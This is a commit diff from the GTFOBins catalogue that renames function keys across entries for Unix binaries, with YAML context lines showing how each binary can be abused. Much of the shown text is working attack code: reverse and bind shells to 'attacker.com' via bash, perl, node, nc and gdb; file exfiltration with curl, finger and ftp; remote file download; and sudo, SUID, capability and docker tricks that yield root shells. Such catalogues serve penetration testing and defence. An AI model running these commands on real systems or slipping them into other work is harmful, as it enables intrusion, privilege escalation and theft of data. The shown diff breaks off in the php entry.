Adopt new function names

This commit is contained in:
Emilio Pinna 2018-10-05 18:55:38 +01:00
parent 1c77f099d3
commit dd337b5ddf
110 changed files with 354 additions and 354 deletions


@ -19,8 +19,8 @@ reverse-shell:
It can send back a reverse shell to a listening attacker to open a remote
network access.
reverse-non-interactive-shell:
label: Reverse non-interactive shell
non-interactive-reverse-shell:
label: Non-interactive reverse shell
description: |
It can send back a non-interactive reverse shell to a listening attacker to
open a remote network access.
@ -30,8 +30,8 @@ bind-shell:
description: |
It can bind a shell to a local port to allow remote network access.
bind-non-interactive-shell:
label: Bind non-interactive shell
non-interactive-bind-shell:
label: Non-interactive bind shell
description: |
It can bind a non-interactive shell to a local port to allow remote network
access.


@ -1,11 +1,11 @@
---
description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
functions:
execute-interactive:
shell:
- code: |
apt-get changelog apt
!/bin/sh
sudo-enabled:
sudo:
- code: |
sudo apt-get changelog apt
!/bin/sh


@ -1,11 +1,11 @@
---
description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
functions:
execute-interactive:
shell:
- code: |
apt-get changelog apt
!/bin/sh
sudo-enabled:
sudo:
- code: |
sudo apt-get changelog apt
!/bin/sh


@ -1,7 +1,7 @@
---
description: Note that the subprocess is immediately sent to the background.
functions:
execute-non-interactive:
command:
- code: |
COMMAND='id'
TF=$(mktemp)
@ -10,14 +10,14 @@ functions:
aria2c --on-download-error=$TF http://x
- description: The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.
code: aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa
suid-enabled:
suid:
- code: |
COMMAND='id'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
./aria2c --on-download-error=$TF http://x
sudo-enabled:
sudo:
- code: |
COMMAND='id'
TF=$(mktemp)


@ -1,13 +1,13 @@
---
functions:
execute-interactive:
shell:
- code: ash
file-write:
- code: |
export LFILE=file_to_write
ash -c 'echo DATA > $LFILE'
suid-enabled:
suid:
- code: "./ash"
sudo-enabled:
sudo:
- code: sudo ash
---


@ -1,8 +1,8 @@
---
functions:
execute-interactive:
shell:
- code: awk 'BEGIN {system("/bin/sh")}'
reverse-shell-non-interactive:
non-interactive-reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
@ -11,7 +11,7 @@ functions:
s = "/inet/tcp/0/" RHOST "/" RPORT;
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
bind-shell-non-interactive:
non-interactive-bind-shell:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: |
LPORT=12345
@ -27,8 +27,8 @@ functions:
- code: |
LFILE=file_to_read
awk '//' "$LFILE"
sudo-enabled:
sudo:
- code: sudo awk 'BEGIN {system("/bin/sh")}'
suid-limited:
limited-suid:
- code: ./awk 'BEGIN {system("/bin/sh")}'
---


@ -4,11 +4,11 @@ functions:
- code: |
LFILE=file_to_read
base64 "$LFILE" | base64 --decode
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./base64 "$LFILE" | base64 --decode
sudo-enabled:
sudo:
- code: |
LFILE=file_to_read
sudo base64 "$LFILE" | base64 --decode


@ -1,14 +1,14 @@
---
functions:
execute-interactive:
shell:
- code: bash
reverse-shell-interactive:
reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
upload:
file-upload:
- description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
code: |
export RHOST=attacker.com
@ -21,7 +21,7 @@ functions:
export RPORT=12345
export LFILE=file_to_send
bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
download:
file-download:
- description: Fetch a remote file via HTTP GET request.
code: |
export RHOST=attacker.com
@ -58,8 +58,8 @@ functions:
HISTTIMEFORMAT=$'\r\e[K'
history -r $LFILE
history
suid-enabled:
suid:
- code: "./bash -p"
sudo-enabled:
sudo:
- code: sudo bash
---


@ -1,9 +1,9 @@
---
description: BusyBox may contain many UNIX utilities, run `busybox --list-full` to check what GTFBins binaries are supported. Here some example.
functions:
execute-interactive:
shell:
- code: busybox sh
upload:
file-upload:
- description: Serve files in the local folder running an HTTP server.
code: |
export LPORT=12345
@ -16,9 +16,9 @@ functions:
- code: |
LFILE=file_to_read
./busybox cat "$LFILE"
suid-enabled:
suid:
- description: It may drop the SUID privileges depending on the compilation flags and the runtime configuration.
code: "./busybox sh"
sudo-enabled:
sudo:
- code: sudo busybox sh
---


@ -4,11 +4,11 @@ functions:
- code: |
LFILE=file_to_read
cat "$LFILE"
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./cat "$LFILE"
sudo-enabled:
sudo:
- code: |
LFILE=file_to_read
sudo cat "$LFILE"


@ -1,11 +1,11 @@
---
description: This can be run with elevated privileges to change permissions and then read, write, or execute a file.
functions:
suid-enabled:
suid:
- code: |
LFILE=file_to_change
./chmod 0777 $LFILE
sudo-enabled:
sudo:
- code: |
LFILE=file_to_change
sudo chmod 0777 $LFILE


@ -1,11 +1,11 @@
---
description: This can be run with elevated privileges to change ownership and then read, write, or execute a file.
functions:
suid-enabled:
suid:
- code: |
LFILE=file_to_change
./chown $(id -un):$(id -gn) $LFILE
sudo-enabled:
sudo:
- code: |
LFILE=file_to_change
sudo chown $(id -un):$(id -gn) $LFILE


@ -1,13 +1,13 @@
---
description: This can be used to copy and then read or write files from a restricted file systems or with elevated privileges.
functions:
suid-enabled:
suid:
- code: |
LFILE=file_to_write
TF=$(mktemp)
echo "DATA" > $TF
./cp $TF $LFILE
sudo-enabled:
sudo:
- code: |
LFILE=file_to_write
TF=$(mktemp)


@ -1,7 +1,7 @@
---
functions:
execute-interactive:
shell:
- code: cpulimit -l 100 -f /bin/sh
sudo-enabled:
sudo:
- code: sudo cpulimit -l 100 -f /bin/sh
---


@ -1,9 +1,9 @@
---
functions:
execute-non-interactive:
command:
- description: The commands are executed according to the crontab file edited via the `crontab` utility.
code: crontab -e
sudo-enabled:
sudo:
- description: The commands are executed according to the crontab file edited via the `crontab` utility.
code: sudo crontab -e
---


@ -1,13 +1,13 @@
---
functions:
execute-interactive:
shell:
- code: csh
file-write:
- code: |
export LFILE=file_to_write
ash -c 'echo DATA > $LFILE'
suid-enabled:
suid:
- code: "./csh -b"
sudo-enabled:
sudo:
- code: sudo csh
---


@ -1,12 +1,12 @@
---
functions:
upload:
file-upload:
- description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Omit the `@` to send hard-coded data.
code: |
URL=http://attacker.com/
LFILE=file_to_send
curl -X POST -d @$file_to_send $URL
download:
file-download:
- description: Fetch a remote file via HTTP GET request.
code: |
URL=http://attacker.com/file_to_get
@ -17,13 +17,13 @@ functions:
code: |
LFILE=/tmp/file_to_read
curl file://$LFILE
suid-enabled:
suid:
- description: Fetch a remote file via HTTP GET request.
code: |
URL=http://attacker.com/file_to_get
LFILE=file_to_save
./curl $URL -o $LFILE
sudo-enabled:
sudo:
- description: Fetch a remote file via HTTP GET request.
code: |
URL=http://attacker.com/file_to_get


@ -4,11 +4,11 @@ functions:
- code: |
LFILE=file_to_read
cut -d "" -f1 "$LFILE"
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./cut -d "" -f1 "$LFILE"
sudo-enabled:
sudo:
- code: |
LFILE=file_to_read
sudo cut -d "" -f1 "$LFILE"


@ -1,13 +1,13 @@
---
functions:
execute-interactive:
shell:
- code: dash
file-write:
- code: |
export LFILE=file_to_write
ash -c 'echo DATA > $LFILE'
suid-enabled:
suid:
- code: ./dash -p
sudo-enabled:
sudo:
- code: sudo dash
---


@ -8,11 +8,11 @@ functions:
- code: |
LFILE=file_to_read
date -f $LFILE
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./date -f $LFILE
sudo-enabled:
sudo:
- code: |
LFILE=file_to_read
sudo date -f $LFILE


@ -8,11 +8,11 @@ functions:
- code: |
LFILE=file_to_read
dd if=LFILE
suid-enabled:
suid:
- code: |
LFILE=file_to_write
echo "data" | ./dd of=$LFILE
sudo-enabled:
sudo:
- code: |
LFILE=file_to_write
echo "data" | sudo -E dd of=$LFILE


@ -4,11 +4,11 @@ functions:
- code: |
LFILE=file_to_read
diff --line-format=%L /dev/null $LFILE
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./diff --line-format=%L /dev/null $LFILE
sudo-enabled:
sudo:
- code: |
LFILE=file_to_read
sudo diff --line-format=%L /dev/null $LFILE


@ -2,11 +2,11 @@
description: |
Exploit the fact that Docker runs as root to create a SUID binary on the host using a container. This requires the user to be privileged enough to run docker, e.g. being in the `docker` group. Any other Docker Linux image should work, e.g., `debian`.
functions:
sudo-enabled:
sudo:
- code: |
sudo docker run --rm -v /home/$USER:/h_docs ubuntu \
sh -c 'cp /bin/sh /h_docs/ && chmod +s /h_docs/sh' && ~/sh -p
suid-enabled:
suid:
- code: |
./docker run --rm -v /home/$USER:/h_docs ubuntu \
sh -c 'cp /bin/sh /h_docs/ && chmod +s /h_docs/sh' && ~/sh -p


@ -1,11 +1,11 @@
---
functions:
execute-interactive:
shell:
- code: |
TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
easy_install $TF
reverse-shell-interactive:
reverse-shell:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
@ -16,7 +16,7 @@ functions:
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")' > $TF/setup.py
easy_install $TF
upload:
file-upload:
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
code: |
export URL=http://attacker.com/
@ -36,7 +36,7 @@ functions:
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py
easy_install $TF
download:
file-download:
- description: Fetch a remote file via HTTP GET request. The file path must be absolute.
code: |
export URL=http://attacker.com/file_to_get
@ -62,12 +62,12 @@ functions:
TF=$(mktemp -d)
echo 'print(open("file_to_read").read())' > $TF/setup.py
easy_install $TF
load-library:
library-load:
- code: |
TF=$(mktemp -d)
echo 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' > $TF/setup.py
easy_install $TF
sudo-enabled:
sudo:
- code: |
TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py


@ -1,6 +1,6 @@
---
functions:
execute-interactive:
shell:
- code: |
ed
!/bin/sh
@ -17,11 +17,11 @@ functions:
ed file_to_read
,p
q
sudo-enabled:
sudo:
- code: |
sudo ed
!/bin/sh
suid-limited:
limited-suid:
- code: |
./ed
!/bin/sh


@ -1,6 +1,6 @@
---
functions:
execute-interactive:
shell:
- code: emacs -Q -nw --eval '(term "/bin/sh")'
file-write:
- code: |
@ -9,8 +9,8 @@ functions:
C-x C-s
file-read:
- code: emacs file_to_read
suid-enabled:
suid:
- code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
sudo-enabled:
sudo:
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
---


@ -1,9 +1,9 @@
---
functions:
execute-interactive:
shell:
- code: env /bin/sh
suid-enabled:
suid:
- code: ./env /bin/sh -p
sudo-enabled:
sudo:
- code: sudo env /bin/sh
---


@ -5,11 +5,11 @@ functions:
- code: |
LFILE=file_to_read
expand "$LFILE"
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./expand "$LFILE"
sudo-enabled:
sudo:
- code: |
LFILE=file_to_read
sudo expand "$LFILE"


@ -1,9 +1,9 @@
---
functions:
execute-interactive:
shell:
- code: expect -c 'spawn /bin/sh;interact'
suid-enabled:
suid:
- code: ./expect -c 'spawn /bin/sh -p;interact'
sudo-enabled:
sudo:
- code: sudo expect -c 'spawn /bin/sh;interact'
---


@ -1,11 +1,11 @@
---
functions:
execute-interactive:
shell:
- code: |
TF=$(mktemp -d)
echo 'exec("/bin/sh")' > $TF/x.rb
FACTERLIB=$TF facter
sudo-enabled:
sudo:
- code: |
TF=$(mktemp -d)
echo 'exec("/bin/sh")' > $TF/x.rb


@ -1,9 +1,9 @@
---
functions:
execute-interactive:
shell:
- code: find . -exec /bin/sh \; -quit
suid-enabled:
suid:
- code: ./find . -exec /bin/sh -p \; -quit
sudo-enabled:
sudo:
- code: sudo find . -exec /bin/sh \; -quit
---


@ -2,13 +2,13 @@
description: |
`finger` hangs waiting for the remote peer to close the socket.
functions:
upload:
file-upload:
- description: Send a binary file to a TCP port. Run `sudo nc -l -p 79 | base64 -d > "file_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments.
code: |
RHOST=attacker.com
LFILE=file_to_send
finger "$(base64 $LFILE)@$RHOST"
download:
file-download:
- description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | sudo nc -l -p 79` on the attacker box to send the file.
code: |
RHOST=attacker.com


@ -1,9 +1,9 @@
---
functions:
execute-interactive:
shell:
- code: flock -u / /bin/sh
suid-enabled:
suid:
- code: ./flock -u / /bin/sh -p
sudo-enabled:
sudo:
- code: sudo flock -u / /bin/sh
---


@ -5,11 +5,11 @@ functions:
- code: |
LFILE=file_to_read
fmt -pNON_EXISTING_PREFIX "$LFILE"
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./fmt -pNON_EXISTING_PREFIX "$LFILE"
sudo-enabled:
sudo:
- code: |
LFILE=file_to_read
sudo fmt -pNON_EXISTING_PREFIX "$LFILE"


@ -4,11 +4,11 @@ functions:
- code: |
LFILE=file_to_read
fold -w99999999 "$LFILE"
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./fold -w99999999 "$LFILE"
sudo-enabled:
sudo:
- code: |
LFILE=file_to_read
sudo fold -w99999999 "$LFILE"


@ -1,22 +1,22 @@
---
functions:
execute-interactive:
shell:
- code: |
ftp
!/bin/sh
upload:
file-upload:
- description: Send local file to a FTP server.
code: |
RHOST=attacker.com
ftp $RHOST
put file_to_send
download:
file-download:
- description: Fetch a remote file from a FTP server.
code: |
RHOST=attacker.com
ftp $RHOST
get file_to_get
sudo-enabled:
sudo:
- code: |
sudo ftp
!/bin/sh


@ -1,8 +1,8 @@
---
functions:
execute-interactive:
shell:
- code: gdb -nx -ex '!sh' -ex quit
reverse-shell-interactive:
reverse-shell:
- description: This requires that GDB is compiled with Python support. Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
@ -11,7 +11,7 @@ functions:
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")' -ex quit
upload:
file-upload:
- description: This requires that GDB is compiled with Python support. Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
code: |
export URL=http://attacker.com/
@ -27,7 +27,7 @@ functions:
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' -ex quit
download:
file-download:
- description: This requires that GDB is compiled with Python support. Fetch a remote file via HTTP GET request.
code: |
export URL=http://attacker.com/file_to_get
@ -44,12 +44,12 @@ functions:
file-read:
- description: This requires that GDB is compiled with Python support.
code: gdb -nx -ex 'python print(open("file_to_read").read())' -ex quit
load-library:
library-load:
- description: This requires that GDB is compiled with Python support.
code: gdb -nx -ex 'python from ctypes import cdll; cdll.LoadLibrary("lib.so")' -ex quit
sudo-enabled:
sudo:
- code: sudo gdb -nx -ex '!sh' -ex quit
capabilities-enabled:
capabilities:
- description: This requires that GDB is compiled with Python support.
code: ./gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit
---


@ -1,9 +1,9 @@
---
functions:
execute-interactive:
shell:
- code: PAGER='sh -c "exec sh 0<&1"' git -p help
sudo-enabled:
sudo:
- code: PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help
suid-limited:
limited-suid:
- code: PAGER='sh -c "exec sh 0<&1"' ./git -p help
---


@ -6,11 +6,11 @@ functions:
- code: |
LFILE=file_to_read
grep '' $LFILE
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./grep '' $LFILE
sudo-enabled:
sudo:
- code: |
LFILE=file_to_read
sudo grep '' $LFILE


@ -4,11 +4,11 @@ functions:
- code: |
LFILE=file_to_read
head -c1G "$LFILE"
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./head -c1G "$LFILE"
sudo-enabled:
sudo:
- code: |
LFILE=file_to_read
sudo head -c1G "$LFILE"


@ -1,9 +1,9 @@
---
functions:
execute-interactive:
shell:
- code: ionice /bin/sh
suid-enabled:
suid:
- code: ./ionice /bin/sh -p
sudo-enabled:
sudo:
- code: sudo ionice /bin/sh
---


@ -4,11 +4,11 @@ description: |
This might not work if run by unprivileged users depending on the system configuration.
functions:
execute-interactive:
shell:
- code: |
journalctl
!/bin/sh
sudo-enabled:
sudo:
- code: |
sudo journalctl
!/bin/sh


@ -4,11 +4,11 @@ functions:
- code: |
LFILE=file_to_read
jq -Rr . "$LFILE"
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./jq -Rr . "$LFILE"
sudo-enabled:
sudo:
- code: |
LFILE=file_to_read
sudo jq -Rr . "$LFILE"


@ -1,14 +1,14 @@
---
functions:
execute-interactive:
shell:
- code: ksh
reverse-shell-interactive:
reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1'
upload:
file-upload:
- description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
code: |
export RHOST=attacker.com
@ -21,7 +21,7 @@ functions:
export RPORT=12345
export LFILE=file_to_send
ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
download:
file-download:
- description: Fetch a remote file via HTTP GET request.
code: |
export RHOST=attacker.com
@ -49,8 +49,8 @@ functions:
code: |
export LFILE=file_to_read
ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"'
suid-enabled:
suid:
- code: ./ksh -p
sudo-enabled:
sudo:
- code: sudo ksh
---


@ -7,10 +7,10 @@ description: |
/lib64/ld-linux-x86-64.so.2
```
functions:
execute-interactive:
shell:
- code: /lib/ld.so /bin/sh
suid-enabled:
suid:
- code: ./ld.so /bin/sh -p
sudo-enabled:
sudo:
- code: sudo /lib/ld.so /bin/sh
---


@ -1,6 +1,6 @@
---
functions:
execute-interactive:
shell:
- code: |
less /etc/profile
!/bin/sh
@ -14,10 +14,10 @@ functions:
echo DATA | less
sfile_to_write
q
sudo-enabled:
sudo:
- code: |
sudo less /etc/profile
!/bin/sh
suid-enabled:
suid:
- code: ./less file_to_read
---


@ -1,7 +1,7 @@
---
functions:
execute-interactive:
shell:
- code: ltrace -b -L /bin/sh
sudo-enabled:
sudo:
- code: sudo ltrace -b -L /bin/sh
---


@ -1,8 +1,8 @@
---
functions:
execute-interactive:
shell:
- code: lua -e 'os.execute("/bin/sh")'
reverse-shell-non-interactive:
non-interactive-reverse-shell:
- description: Run ``nc -l -p 12345`` on the attacker box to receive the shell. This requires `lua-socket` installed.
code: |
export RHOST=attacker.com
@ -15,7 +15,7 @@ functions:
local b=assert(f:read("*a"));t:send(b);
end;
f:close();t:close();'
bind-shell-non-interactive:
non-interactive-bind-shell:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell. This requires `lua-socket` installed.
code: |
export LPORT=12345
@ -26,7 +26,7 @@ functions:
local r,x=c:receive();local f=assert(io.popen(r,"r"));
local b=assert(f:read("*a"));c:send(b);
end;c:close();f:close();'
upload:
file-upload:
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. This requires `lua-socket` installed.
code: |
RHOST=attacker.com
@ -41,7 +41,7 @@ functions:
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
t:send(d);
t:close();'
download:
file-download:
- description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345
< "file_to_send"` on the attacker box to send the file. This requires `lua-socket` installed.
code: |
@ -59,8 +59,8 @@ functions:
- code: lua -e 'local f=io.open("file_to_write", "wb"); f:write("DATA"); io.close(f);'
file-read:
- code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);'
sudo-enabled:
sudo:
- code: sudo lua -e 'os.execute("/bin/sh")'
suid-limited:
limited-suid:
- code: ./lua -e 'os.execute("/bin/sh")'
---


@ -1,13 +1,13 @@
---
functions:
execute-interactive:
shell:
- description: This creates a valid Mbox file which may be required by the binary.
code: |
TF=$(mktemp)
echo "From nobody@localhost $(date)" > $TF
mail -f $TF
!/bin/sh
sudo-enabled:
sudo:
- description: This creates a valid Mbox file which may be required by the binary.
code: |
TF=$(mktemp)


@ -1,7 +1,7 @@
---
description: All these examples only work with GNU `make` due to the lack of support of the `--eval` flag. The same can be achieved by using a proper `Makefile` or by passing the content via stdin using `-f -`.
functions:
execute-interactive:
shell:
- code: |
COMMAND='/bin/sh'
make -s --eval=$'x:\n\t-'"$COMMAND"
@ -10,11 +10,11 @@ functions:
code: |
LFILE=file_to_write
make -s --eval="\$(file >$LFILE,DATA)" .
suid-enabled:
suid:
- code: |
COMMAND='/bin/sh -p'
./make -s --eval=$'x:\n\t-'"$COMMAND"
sudo-enabled:
sudo:
- code: |
COMMAND='/bin/sh'
sudo make -s --eval=$'x:\n\t-'"$COMMAND"


@ -1,16 +1,16 @@
---
functions:
execute-interactive:
shell:
- code: |
man man
!/bin/sh
file-read:
- code: man file_to_read
sudo-enabled:
sudo:
- code: |
sudo man man
!/bin/sh
suid-limited:
limited-suid:
- code: |
./man man
!/bin/sh


@ -1,14 +1,14 @@
---
functions:
execute-interactive:
shell:
- code: |
TERM= more /etc/profile
!/bin/sh
file-read:
- code: more file_to_read
suid-enabled:
suid:
- code: ./more file_to_read
sudo-enabled:
sudo:
- code: |
TERM= sudo -E more /etc/profile
!/bin/sh


@ -1,6 +1,6 @@
---
functions:
sudo-enabled:
sudo:
- description: Exploit the fact that `mount` can be executed via `sudo` to *replace* the `mount` binary with a shell.
code: |
sudo mount -o bind /bin/sh /bin/mount


@ -1,13 +1,13 @@
---
description: This can be used to move and then read or write files from a restricted file systems or with elevated privileges.
functions:
suid-enabled:
suid:
- code: |
LFILE=file_to_write
TF=$(mktemp)
echo "DATA" > $TF
./mv $TF $LFILE
sudo-enabled:
sudo:
- code: |
LFILE=file_to_write
TF=$(mktemp)


@ -1,10 +1,10 @@
---
description: A valid MySQL server must be available.
functions:
execute-interactive:
shell:
- code: mysql -e '\! /bin/sh'
sudo-enabled:
sudo:
- code: sudo mysql -e '\! /bin/sh'
suid-limited:
limited-suid:
- code: ./mysql -e '\! /bin/sh'
---


@ -1,6 +1,6 @@
---
functions:
execute-interactive:
shell:
- code: |
TF=$(mktemp)
echo 'exec sh' > $TF
@ -14,14 +14,14 @@ functions:
^O
file-read:
- code: nano file_to_read
suid-enabled:
suid:
- code: |
TF=$(mktemp)
echo 'exec sh -p' > $TF
chmod +x $TF
./nano -s $TF /etc/hosts
^T
sudo-enabled:
sudo:
- code: |
TF=$(mktemp)
echo 'exec sh' > $TF


@ -1,36 +1,36 @@
---
functions:
reverse-shell-interactive:
reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.
code: |
RHOST=attacker.com
RPORT=12345
nc -e /bin/sh $RHOST $RPORT
bind-shell-interactive:
bind-shell:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell. This only works with netcat traditional.
code: |
LPORT=12345
nc -l -p $LPORT -e /bin/sh
upload:
file-upload:
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
code: |
RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
nc $RHOST $RPORT < "$LFILE"
download:
file-download:
- description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
code: |
LPORT=12345
LFILE=file_to_save
nc -l -p $LPORT > "$LFILE"
sudo-enabled:
sudo:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.
code: |
RHOST=attacker.com
RPORT=12345
sudo nc -e /bin/sh $RHOST $RPORT
suid-limited:
limited-suid:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.
code: |
RHOST=attacker.com


@ -1,9 +1,9 @@
---
functions:
execute-interactive:
shell:
- code: nice /bin/sh
suid-enabled:
suid:
- code: ./nice /bin/sh -p
sudo-enabled:
sudo:
- code: sudo nice /bin/sh
---


@ -5,11 +5,11 @@ functions:
- code: |
LFILE=file_to_read
nl -bn -w1 -s '' $LFILE
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./nl -bn -w1 -s '' $LFILE
sudo-enabled:
sudo:
- code: |
LFILE=file_to_read
sudo nl -bn -w1 -s '' $LFILE


@ -1,12 +1,12 @@
---
functions:
execute-interactive:
shell:
- description: Input echo is disabled.
code: |
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
nmap --script=$TF
reverse-shell-non-interactive:
non-interactive-reverse-shell:
- description: Run ``nc -l -p 12345`` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
@ -21,7 +21,7 @@ functions:
end;
f:close();t:close();' > $TF
nmap --script=$TF
bind-shell-non-interactive:
non-interactive-bind-shell:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: |
export LPORT=12345
@ -34,7 +34,7 @@ functions:
local b=assert(f:read("*a"));c:send(b);
end;c:close();f:close();' > $TF
nmap --script=$TF
upload:
file-upload:
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
code: |
export RHOST=attacker.com
@ -50,7 +50,7 @@ functions:
t:send(d);
t:close();' > $TF
nmap --script=$TF
download:
file-download:
- description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345
< "file_to_send"` on the attacker box to send the file.
code: |
@ -76,13 +76,13 @@ functions:
TF=$(mktemp)
echo 'lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF
nmap --script=$TF
sudo-enabled:
sudo:
- description: Input echo is disabled.
code: |
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF
suid-limited:
limited-suid:
- description: Input echo is disabled.
code: |
TF=$(mktemp)


@ -1,9 +1,9 @@
---
functions:
execute-interactive:
shell:
- code: |
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
reverse-shell-interactive:
reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
@ -14,7 +14,7 @@ functions:
sh.stdout.pipe(this);
sh.stderr.pipe(this);
});'
bind-shell-interactive:
bind-shell:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: |
export LPORT=12345
@ -24,13 +24,13 @@ functions:
sh.stdout.pipe(client);
sh.stderr.pipe(client);
}).listen(process.env.LPORT);'
suid-enabled:
suid:
- code: |
./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
sudo-enabled:
sudo:
- code: |
sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
capabilities-enabled:
capabilities:
- code: |
./node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
---


@ -5,11 +5,11 @@ functions:
- code: |
LFILE=file_to_read
od -An -c -w9999 "$LFILE"
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./od -An -c -w9999 "$LFILE"
sudo-enabled:
sudo:
- code: |
LFILE=file_to_read
sudo od -An -c -w9999 "$LFILE"


@ -1,17 +1,17 @@
---
functions:
execute-interactive:
shell:
- code: perl -e 'exec "/bin/sh";'
reverse-shell-interactive:
reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
suid-enabled:
suid:
- code: ./perl -e 'exec "/bin/sh";'
sudo-enabled:
sudo:
- code: sudo perl -e 'exec "/bin/sh";'
capabilities-enabled:
capabilities:
- code: ./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
---


@ -1,15 +1,15 @@
---
functions:
execute-interactive:
shell:
- code: |
pg /etc/profile
!/bin/sh
file-read:
- code: pg file_to_read
sudo-enabled:
sudo:
- code: |
sudo pg /etc/profile
!/bin/sh
suid-enabled:
suid:
- code: ./pg file_to_read
---


@ -1,6 +1,6 @@
---
functions:
execute-interactive:
shell:
- code: |
export CMD="/bin/sh"
php -r 'system(getenv("CMD"));'
@ -16,37 +16,37 @@ functions:
- code: |
export CMD="/bin/sh"
